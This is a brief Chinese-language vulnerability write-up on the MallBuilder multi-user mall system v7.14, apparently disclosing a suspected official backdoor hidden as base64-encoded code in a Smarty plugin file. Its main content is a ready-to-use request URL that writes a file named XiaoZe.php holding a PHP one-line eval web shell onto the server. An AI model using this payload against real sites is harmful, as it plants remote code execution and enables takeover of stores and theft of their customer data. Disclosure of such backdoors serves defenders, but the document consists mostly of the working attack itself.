审计对象：MallBuilder 多用户商城管理系统 v7.14 简体中文版
MallBuilder下载地址：http://down.admin5.com/php/98938.html
参考文章：远丰集团旗下CMS疑有官方后门

payload：/mallbuilder/lib/smarty/plugins/modifier.config.php?codelock_filed=.&codelock_mastersize=3&codelock_act=3&codelock_enc=XiaoZe.php&codelock_masterdata=<?php @eval($_POST[X]);?>

漏洞发生在/lib/smarty/plugins/function.php文件中，经过base64加密过的代码。